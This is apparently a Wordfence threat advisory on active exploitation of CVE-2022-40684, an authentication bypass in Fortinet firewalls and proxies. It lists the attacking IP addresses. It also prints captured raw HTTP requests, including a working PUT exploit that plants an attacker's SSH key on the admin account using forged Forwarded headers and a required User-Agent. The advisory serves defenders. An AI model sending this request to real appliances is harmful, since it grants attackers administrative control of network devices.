Threat Advisory: CVE-2022-40684 Fortinet Appliance Auth bypass

This morning, the Wordfence Threat Intelligence team began tracking exploit attempts targeting CVE-2022-40684 on our network of over 4 million protected websites. CVE-2022-40684 is a critical authentication bypass vulnerability in the administrative interface of Fortinet’s FortiGate firewalls, FortiProxy web proxies, and FortiSwitch Manager, and is being actively exploited in the wild¹,².

At the time of publishing, we have recorded several exploit attempts and requests originating from the following IP addresses:

  • 206.189.231.41
  • 172.105.131.156
  • 45.79.174.33
  • 143.110.215.248
  • 159.180.168.61
  • 194.195.241.147
  • 45.79.174.9
  • 45.79.174.160
  • 134.122.38.186
  • 104.244.77.122
  • 45.79.174.212
  • 2.58.82.81
  • 194.163.135.129
  • 173.212.205.42
  • 172.104.6.178
  • 38.242.217.243
  • 194.135.83.48
  • 134.122.44.177
  • 207.180.241.85
  • 75.128.217.136
  • 107.189.4.80

Most of the requests we have observed are GET requests presumably trying to determine whether a Fortinet appliance is in place:

GET /api/v2/cmdb/system/admin/admin HTTP/1.1
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
X-Forwarded-Proto: https
X-Forwarded-Ssl: on
X-Forwarded-For: 75.128.217.136
Host: <redacted>
Content-Type: application/x-www-form-urlencoded

However, we also found that a number of these IPs are also sending out PUT requests matching the recently released proof of concept, referenced at the end of this advisory, which attempts to update the public SSH key of the admin user:

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
X-Forwarded-For: 172.104.6.178
Accept-Encoding: gzip
Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
Connection: close
User-Agent: Report Runner
Host: <redacted>
Content-Type: application/json
Content-Length: 610


{
"Ssh-public-key1":""ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOC0lL4quBWMUAM9g/g9TSutzDupGQOnlYqfaNEIZqnSLJ3Mfln6rGSYol/WSm6/N7TNpuVFScRtmdUZ9O8oSamyaizqMG5hcRKRiI49F49judolcffBCTaVpQpxqt+tjcuGzZAoIqg6TyHg1BNoja/IjUQIVbNGyzl+DxmsX3mbmIwmffoyV8l4sEOynYqP3TC2Z8wJWv3WGudHMEDXBiyN3lrIDKlHzROWBkGQOcv3dCoYFTkzdKYPMtnTNdGOOF6wgWB3Y/fHyyWvbN23N2mxsgbRMdKTItJJNLGiJwYBHnC3lp2CQQlrYfsAnBQRu56gp7TPgheP+UYyGlYy4mcnsanGYCS4VozGfWwvhTSGEP5Uws/WxWNFq3Be7c/IWPx5AzvzT3iOq9R704xL1BxW9KAkPmjegav/jOEEh5YX7b+HcErMpTfo5DCi0CZilBUn9q/qM3v4HWKgJObaJnycE/PPyZML0xof29qvbXJDy2efYeCUCfxAIHUcJx58= dev@devs-MacBook-Pro.local""
}

While some requests are using a fake public key, which may indicate a benign vulnerability scanner, all of the requests using a valid public key are using the same public key, indicating that these requests are all the work of the same actor. An attacker able to update or add a valid public SSH key to a user’s account on a system can then typically gain access to that system as that user if they have the corresponding private key. In this case the attacker is attempting to add their own public key to the admin user’s account.

The SSH key has the following fingerprint: SHA256:GBl4Pytt+W2yEZ3zlOkAZkgtqmTPBcEZlqK4hoNOqBU dev@devs-MacBook-Pro.local (RSA)

All of the PUT exploit attempts we have seen are using the “Report Runner” User-Agent as this is a requirement of the exploit, though the exploit may also be viable with the User-Agent set to “Node.js”.

New IP Addresses attacking CVE-2022-40684 will appear on the Wordfence Intelligence IP Threat Feed in the “auth_bypass” category as the feed is updated every 60 minutes.

1. Fortinet released an advisory with additional information, including affected products and workarounds for users unable to patch.
2. Horizon3.ai initially discovered that the vulnerability was being exploited in the wild and released a proof of concept earlier today.

The post Threat Advisory: CVE-2022-40684 Fortinet Appliance Auth bypass appeared first on Wordfence.